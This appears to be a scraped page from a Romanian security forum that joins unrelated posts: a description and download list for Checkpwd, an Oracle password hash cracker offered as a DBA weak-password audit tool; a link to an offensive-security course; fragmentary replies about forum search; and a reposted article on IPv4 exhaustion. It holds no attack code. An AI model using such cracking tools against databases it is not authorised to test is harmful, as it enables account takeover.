Oracle Password Checker (Cracker) Checkpwd 1.23 (free) Checkpwd 1.23 is one of the fastest (see Benchmark) dictionary based password checker for Oracle databases. This is a useful tool for DBA's to identify Oracle accounts with weak or default passwords. Version 1.23 contains a version which only shows that a password is weak but not the password itself. Checkpwd reads the password hashes from the view dba_users and compares the hashkeys with the hashkeys calculated from a dictionary file. Details about Oracle (database) passwords are available here: Fact Sheet about Oracle database passwords. Downloads Checkpwd 1.23 (for Windows) + default passwords + libaries + wordlist with 1.5 Mio words + Oracle Instant Client 10.2 (35 MB, MD5SUM: d41737cca1b07d66bd134c53989fa1b5 *oracle_checkpwd_big.zip) Checkpwd 1.23 (for Windows) + default passwords + libaries (1.5 MB, MD5SUM: 17a00e28b9ff0e6bed45554b43f62b06 *oracle_checkpwd.zip) Checkpwd 1.23 - passwords not displayed - (for Windows) + default passwords + libaries (1.5 MB, MD5SUM: 6638b0c82dea7685b6e045c9f7136168 *oracle_checkpwd_nopw.zip) Checkpwd 1.23 (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: aa05f5e7c8a20ec1094e68143085c3a7 *oracle_checkpwd_linux.tar.gz) Checkpwd 1.23 - passwords not displayed - (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: b0f356a27f6089275637555fbe70445d *oracle_checkpwd_nopw_linux.tar.gz) Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (48 MB, MD5SUM: fe4608bf25915585adea5bf668ec6569 *oracle_checkpwd_mac_big.tar.gz) Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: 53bfaf05ba7375a576a55d30f4a44319 *oracle_checkpwd_mac.tar.gz) Checkpwd 1.23 - passwords not displayed - (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: dc4a3c623224055de5a8bac0f076f7a6 *oracle_checkpwd_nopw_mac.tar.gz) Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (37 MB, MD5SUM: be18c958cf1a7af27c7825c9c78c3fa6 *oracle_checkpwd_mac_intel_big.zip) Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: f7d82902baea9df804e55b757c452aa3 *oracle_checkpwd_mac_intel.zip) Checkpwd 1.23 - passwords not displayed - (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: edac226122e78c7690bef1b0e4780959 *oracle_checkpwd_nopw_mac_intel.zip) Sursa: Oracle Password Cracker (Checker)

[h=1]Offensive Computer Security Spring 2014[/h] [h=1]Spring 2014 Lectures & Videos[/h] This page contains all the lecture Lecture Slides and youtube videos for the Spring 2014 semester of this course. [h=1]Course Lecture Videos / Slides / Reading:[/h] Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on youtube are lower quality than the ones avaiable for direct download (see above). On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic. Restul aici: Offensive Computer Security Home Page (CIS 4930 / CIS 5930) Spring 2014

Si pe Linux cu ce il putem vedea?

Solutie: custom DNS client in browser.

Si cum va primi TheTime notificare daca doar se pune un link in locul numelui?

Inteleg ideea ta generala, dar eu vreau mai detaliat. Luam asa: eu incerc sa creez un topic. Vreau sa se numeasca "Ajutor WiFi". Incep sa tastez "Ajuto.." si ce sa se intample, sa apara titlurile topicurilor care contin "Ajuto"? Dupa ce scriu complet, "Ajutor WiFi", sa apara topicurile cu acel nume, exact acel nume?

Si cum sa se faca mai exact cautarea? Un search simplu si daca exista un topic cu exact acelasi nume sa i se dea link catre el? Ar trebui sa poata insa posta un topic cu acel nume, nu putem cere ca numele unui topic sa fie "primary key".

The Google Web Search API has been officially deprecated as of November 1, 2010 Therefore, we encourage you to move to Custom Search, which provides an alternative solution. Oricum, nu se poate asa. Daca x posteaza "Programul smecher" si y posteaza "Programul smecher v5" si z posteaza "Programul smecher v6" ce faci? E vorba de inteligenta artificiala ca sa functioneze ok. Te trezesti ca nu te lasa sa postezi cu titlul "Ajutor" si multe altele.

Probabil ne va bloca Google si va cere CAPTCHA. In plus, pot fi extrem de multe false positive. Ideea e ok, dar o versiune buna e greu de implementat.

Daca e functional acel plugin, se va "implementa". Dar va garantez ca nu stau eu sa va scriu cod pentru asa ceva. Ma uit maine.

Whatever happened to the IPv4 address crisis? By Lee Schlesinger, Network World February 17, 2014 06:30 AM ET Network World - In February 2011, the global Internet Assigned Numbers Authority (IANA) allocated the last blocks of IPv4 address space to the five regional Internet registries. At the time, experts warned that within months all available IPv4 addresses in the world would be distributed to ISPs. Soon after that, unless everyone upgraded to IPv6, the world would be facing a crisis that would hamper Internet connectivity for everyone. That crisis would be exacerbated by the skyrocketing demand for IP addresses due to a variety of factors: the Internet of Things (refrigerators needing their own IP address); wearables (watches and glasses demanding connectivity); BYOD (the explosion of mobile devices allowed to connect to the corporate network); and the increase in smartphone use in developing countries. So, here we are three years later and the American Registry for Internet Numbers (ARIN) is still doling out IPv4 addresses in the United States and Canada. Whatever happened to the IPv4 address crisis? The day of reckoning still looms – it’s just been pushed out as the major Internet players have developed ingenious ways to stretch those available numbers. But these conservation efforts can only work for so long. ARIN currently has “approximately 24 million IPv4 addresses in the available pool for the region,” according to President and CEO John Curran. They’re available to ISPs large and small, but Curran predicts they will all likely be handed out by “sometime in 2014.” Even then, addresses will still be available to be assigned to the operators' clients for a while longer. And not all operators are likely to experience shortages at the same time. "It's more of a problem for networks that are growing. For networks that are stable, they can reuse addresses" as some customers drop their service and new ones sign up. Phil Roberts, technology program manager for the Internet Society, adds, "There's some anticipation in using addresses. Network operators get a block and parcel them out – you don't get them right when you need them." How did we get here? The problem took no one by surprise. The Internet Engineering Task Force (IETF) foresaw the global growth of network-connected devices 20 years ago, and in response drafted a new version of the Internet Protocol to address the looming shortage. IPv6 uses a 128-bit address space – that is, 2^128 – yielding far more potential addresses than IPv4’s 32-bit scheme, and in fact more addresses than there are grains of sand in the Earth’s crust. So, why hasn’t everyone just switched over to IPv6? Well, IPv6 is not backward compatible with IPv4, meaning network operators need to run a dual stack IPv4/IPv6 network for years to come. And for IPv6 to work, it needs to be implemented end to end, meaning IPv6 has to be enabled by network hardware vendors, transit providers, access providers, content providers, and endpoint hardware makers. Since there’s no economic incentive to being the first to invest in revamping your protocol support, many hardware and service providers stood on the sidelines and waited for momentum to build. Articol complet: https://www.networkworld.com/news/2014/021714-ipv4-278692.html